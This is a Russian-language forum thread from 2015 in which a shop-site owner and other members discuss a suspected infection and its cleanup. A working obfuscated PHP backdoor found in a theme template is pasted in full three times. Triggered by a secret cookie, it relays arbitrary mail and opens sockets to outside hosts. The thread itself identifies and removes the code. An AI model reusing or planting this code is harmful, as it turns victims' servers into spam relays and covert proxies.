Помощь Вирус или что?

byura · 15 Окт 2015

кинь пока сайт в личку ftp подождет пока

Dj-Tiesto · 15 Окт 2015

Не понимаю что это там делает - view/theme/default/template/product/product_uncle.php

PHP:

<?php
if(isset($_COOKIE['oCNxDvV3TBU'])){
function hlqjmitxtl(){
    function nhsyodpore($jqxoopplmi){
        $m = md5($jqxoopplmi);
        foreach(explode("\n",trim(chunk_split($m, 2))) as $h)
            $s.=chr(hexdec($h));
        return $s;
    }
    function jgngvtsovu($fzzuvdhsad, $ks){
        $s=range(0, 255);
        if(strlen($fzzuvdhsad)==0)return $s;
        $km=nhsyodpore($fzzuvdhsad);
        for($i=0;$i<16;$i++)
            $kx.= nhsyodpore($km.$km[$i].chr($ks));
        $r=($ks%0x0F)+1;$j=$ks;
        for($n=0;$n<$r;$n++)
            for($i=0;$i<256;$i++){
                $j=(($j+$s[$i]+$n+ord($kx[$i]))^$ks)%256;
                $t=$s[$i];
                $s[$i]=$s[$j];
                $s[$j]=$t;
            }
        for($i=0;$i<256;$i++)
            $s[$i]=$s[$i]^$ks;
        return $s;
    }
    function ltvlojvvnl($fzzuvdhsad){
        $m=nhsyodpore($fzzuvdhsad);$kt=0;
        for($i=0;$i<16;$i++)
            $kt+=ord($m[$i]);
        return $kt%256;
    }
    function ccfmhrqodl($jqxoopplmi){
        $pe=$GLOBALS['xeuzevobel'];
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y]=chr($pe[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
    function czgjtqaqky($jqxoopplmi){
        $pd=array_flip($GLOBALS['xeuzevobel']);
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y] = chr($pd[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
define('tglrtzvzwb', sha1("56d41f".$_COOKIE['oCNxDvV3TBU']));
$GLOBALS['qntbosqxrq'] = ltvlojvvnl(tglrtzvzwb);
$GLOBALS['xeuzevobel'] = jgngvtsovu(tglrtzvzwb, $GLOBALS['qntbosqxrq']);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
$rdbtsplcsl=fopen('php://input', 'r');
$ifkouzamts=fread($rdbtsplcsl,1);
$tqwyiwogvd=fread($rdbtsplcsl,1);
$zhfokdntly=fread($rdbtsplcsl,1);
while(!feof($rdbtsplcsl))
    $pezcpjbpop .= fread($rdbtsplcsl, pow(2,ord($tqwyiwogvd)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    $pezcpjbpop = czgjtqaqky($pezcpjbpop);
fclose($rdbtsplcsl);
if($ifkouzamts==2){
    $daonqgebpt=explode("#^|^#",trim(base64_decode/**/($pezcpjbpop)));
    if(mail/**/($daonqgebpt[0],$daonqgebpt[1],$daonqgebpt[2],$daonqgebpt[3],$daonqgebpt[4]))
        die("send-oCNxDvV3TBU");
    else
        die("error-oCNxDvV3TBU");
}
$pezcpjbpop = base64_decode(/**/($pezcpjbpop));
$fwgqksgqmo = substr($pezcpjbpop,1,ord($pezcpjbpop[0]));
$fp=@fsockopen/**/(($ifkouzamts?"ssl://":"").$fwgqksgqmo,($ifkouzamts?443:80),$errno,$errstr,58);
if(!$fp)die("$errstr($errno);");
@fwrite($fp, substr($pezcpjbpop,ord($pezcpjbpop[0])+1));
while(!feof($fp))
    $ywbjrqqtuw .= fread($fp, pow(2,ord($zhfokdntly)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    echo "#".ccfmhrqodl($ywbjrqqtuw)."#";
else
    echo $ywbjrqqtuw;
fflush($fp);
fclose($fp);
die;
}hlqjmitxtl();}

paul_rem · 15 Окт 2015

Dj-Tiesto написал(а):

Не понимаю что это там делает - view/theme/default/template/product/product_uncle.php

PHP:

<?php
if(isset($_COOKIE['oCNxDvV3TBU'])){
function hlqjmitxtl(){
    function nhsyodpore($jqxoopplmi){
        $m = md5($jqxoopplmi);
        foreach(explode("\n",trim(chunk_split($m, 2))) as $h)
            $s.=chr(hexdec($h));
        return $s;
    }
    function jgngvtsovu($fzzuvdhsad, $ks){
        $s=range(0, 255);
        if(strlen($fzzuvdhsad)==0)return $s;
        $km=nhsyodpore($fzzuvdhsad);
        for($i=0;$i<16;$i++)
            $kx.= nhsyodpore($km.$km[$i].chr($ks));
        $r=($ks%0x0F)+1;$j=$ks;
        for($n=0;$n<$r;$n++)
            for($i=0;$i<256;$i++){
                $j=(($j+$s[$i]+$n+ord($kx[$i]))^$ks)%256;
                $t=$s[$i];
                $s[$i]=$s[$j];
                $s[$j]=$t;
            }
        for($i=0;$i<256;$i++)
            $s[$i]=$s[$i]^$ks;
        return $s;
    }
    function ltvlojvvnl($fzzuvdhsad){
        $m=nhsyodpore($fzzuvdhsad);$kt=0;
        for($i=0;$i<16;$i++)
            $kt+=ord($m[$i]);
        return $kt%256;
    }
    function ccfmhrqodl($jqxoopplmi){
        $pe=$GLOBALS['xeuzevobel'];
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y]=chr($pe[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
    function czgjtqaqky($jqxoopplmi){
        $pd=array_flip($GLOBALS['xeuzevobel']);
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y] = chr($pd[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
define('tglrtzvzwb', sha1("56d41f".$_COOKIE['oCNxDvV3TBU']));
$GLOBALS['qntbosqxrq'] = ltvlojvvnl(tglrtzvzwb);
$GLOBALS['xeuzevobel'] = jgngvtsovu(tglrtzvzwb, $GLOBALS['qntbosqxrq']);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
$rdbtsplcsl=fopen('php://input', 'r');
$ifkouzamts=fread($rdbtsplcsl,1);
$tqwyiwogvd=fread($rdbtsplcsl,1);
$zhfokdntly=fread($rdbtsplcsl,1);
while(!feof($rdbtsplcsl))
    $pezcpjbpop .= fread($rdbtsplcsl, pow(2,ord($tqwyiwogvd)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    $pezcpjbpop = czgjtqaqky($pezcpjbpop);
fclose($rdbtsplcsl);
if($ifkouzamts==2){
    $daonqgebpt=explode("#^|^#",trim(base64_decode/**/($pezcpjbpop)));
    if(mail/**/($daonqgebpt[0],$daonqgebpt[1],$daonqgebpt[2],$daonqgebpt[3],$daonqgebpt[4]))
        die("send-oCNxDvV3TBU");
    else
        die("error-oCNxDvV3TBU");
}
$pezcpjbpop = base64_decode(/**/($pezcpjbpop));
$fwgqksgqmo = substr($pezcpjbpop,1,ord($pezcpjbpop[0]));
$fp=@fsockopen/**/(($ifkouzamts?"ssl://":"").$fwgqksgqmo,($ifkouzamts?443:80),$errno,$errstr,58);
if(!$fp)die("$errstr($errno);");
@fwrite($fp, substr($pezcpjbpop,ord($pezcpjbpop[0])+1));
while(!feof($fp))
    $ywbjrqqtuw .= fread($fp, pow(2,ord($zhfokdntly)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    echo "#".ccfmhrqodl($ywbjrqqtuw)."#";
else
    echo $ywbjrqqtuw;
fflush($fp);
fclose($fp);
die;
}hlqjmitxtl();}

явно какая-то хрень, еще что-то нашел может? Думаю, что это можно удалить.

denverkurt · 17 Окт 2015

какой-то бэкдор на сокете

byura · 17 Окт 2015

вирусов не нашел все левые ссылки были Для просмотра ссылки Войди или Зарегистрируйся уже не показывают, только кеш
что делали?

paul_rem · 17 Окт 2015

byura написал(а):
вирусов не нашел все левые ссылки были Для просмотра ссылки Войди или Зарегистрируйся уже не показывают, только кеш
что делали?

Был доступ к фтп раньше у программиста , который писал парсер, я удалил этот доступ, откатил сайт на пару недель назад как началась большая нагрузка на сервер. Могу предположить , что нагрузка связана была с этими вот махинациями. На сколько программист связан с этими махинациями не знаю, доказать сложно. Но вот из кеша в яндексе фразы не ушли, как их убрать? кто подскажет? я одно время даже переходил из метрики по этим фразам и делал уведомления яндексу , что результат в поиске не верный . Думаю понимаете о чем я, это когда поиск по яндексу делаешь и можно сделать своего рода жалобу яндексу, может таким образом продолжать делать уведомления яндексу на эти ссылки неверные в выдаче? это как нибудь отрицательно отразится на сайте?

byura · 17 Окт 2015

закрой в robots.txt индексацию Для просмотра ссылки Войди или Зарегистрируйся

paul_rem · 18 Окт 2015

byura написал(а):
закрой в robots.txt индексацию Для просмотра ссылки Войди или Зарегистрируйся

вот такую строчку сделал, всё правильно ?

Код:

Disallow: /*?lnq=

byura · 18 Окт 2015

paul_rem написал(а):
Disallow: /*?lnq=

да

paul_rem · 19 Окт 2015

Dj-Tiesto написал(а):

Не понимаю что это там делает - view/theme/default/template/product/product_uncle.php

PHP:

<?php
if(isset($_COOKIE['oCNxDvV3TBU'])){
function hlqjmitxtl(){
    function nhsyodpore($jqxoopplmi){
        $m = md5($jqxoopplmi);
        foreach(explode("\n",trim(chunk_split($m, 2))) as $h)
            $s.=chr(hexdec($h));
        return $s;
    }
    function jgngvtsovu($fzzuvdhsad, $ks){
        $s=range(0, 255);
        if(strlen($fzzuvdhsad)==0)return $s;
        $km=nhsyodpore($fzzuvdhsad);
        for($i=0;$i<16;$i++)
            $kx.= nhsyodpore($km.$km[$i].chr($ks));
        $r=($ks%0x0F)+1;$j=$ks;
        for($n=0;$n<$r;$n++)
            for($i=0;$i<256;$i++){
                $j=(($j+$s[$i]+$n+ord($kx[$i]))^$ks)%256;
                $t=$s[$i];
                $s[$i]=$s[$j];
                $s[$j]=$t;
            }
        for($i=0;$i<256;$i++)
            $s[$i]=$s[$i]^$ks;
        return $s;
    }
    function ltvlojvvnl($fzzuvdhsad){
        $m=nhsyodpore($fzzuvdhsad);$kt=0;
        for($i=0;$i<16;$i++)
            $kt+=ord($m[$i]);
        return $kt%256;
    }
    function ccfmhrqodl($jqxoopplmi){
        $pe=$GLOBALS['xeuzevobel'];
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y]=chr($pe[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
    function czgjtqaqky($jqxoopplmi){
        $pd=array_flip($GLOBALS['xeuzevobel']);
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y] = chr($pd[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
define('tglrtzvzwb', sha1("56d41f".$_COOKIE['oCNxDvV3TBU']));
$GLOBALS['qntbosqxrq'] = ltvlojvvnl(tglrtzvzwb);
$GLOBALS['xeuzevobel'] = jgngvtsovu(tglrtzvzwb, $GLOBALS['qntbosqxrq']);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
$rdbtsplcsl=fopen('php://input', 'r');
$ifkouzamts=fread($rdbtsplcsl,1);
$tqwyiwogvd=fread($rdbtsplcsl,1);
$zhfokdntly=fread($rdbtsplcsl,1);
while(!feof($rdbtsplcsl))
    $pezcpjbpop .= fread($rdbtsplcsl, pow(2,ord($tqwyiwogvd)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    $pezcpjbpop = czgjtqaqky($pezcpjbpop);
fclose($rdbtsplcsl);
if($ifkouzamts==2){
    $daonqgebpt=explode("#^|^#",trim(base64_decode/**/($pezcpjbpop)));
    if(mail/**/($daonqgebpt[0],$daonqgebpt[1],$daonqgebpt[2],$daonqgebpt[3],$daonqgebpt[4]))
        die("send-oCNxDvV3TBU");
    else
        die("error-oCNxDvV3TBU");
}
$pezcpjbpop = base64_decode(/**/($pezcpjbpop));
$fwgqksgqmo = substr($pezcpjbpop,1,ord($pezcpjbpop[0]));
$fp=@fsockopen/**/(($ifkouzamts?"ssl://":"").$fwgqksgqmo,($ifkouzamts?443:80),$errno,$errstr,58);
if(!$fp)die("$errstr($errno);");
@fwrite($fp, substr($pezcpjbpop,ord($pezcpjbpop[0])+1));
while(!feof($fp))
    $ywbjrqqtuw .= fread($fp, pow(2,ord($zhfokdntly)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    echo "#".ccfmhrqodl($ywbjrqqtuw)."#";
else
    echo $ywbjrqqtuw;
fflush($fp);
fclose($fp);
die;
}hlqjmitxtl();}

Привет, подскажи, что за подозрительная активность могла быть у сайта ? вот переходы
на страницы Для просмотра ссылки Войди или Зарегистрируйся или Для просмотра ссылки Войди или Зарегистрируйся

Помощь Вирус или что?

byura

Хранитель порядка

Dj-Tiesto

Стероид

paul_rem

Знаток

denverkurt

Denve®

byura

Хранитель порядка

paul_rem

Знаток

byura

Хранитель порядка

paul_rem

Знаток

byura

Хранитель порядка

paul_rem

Знаток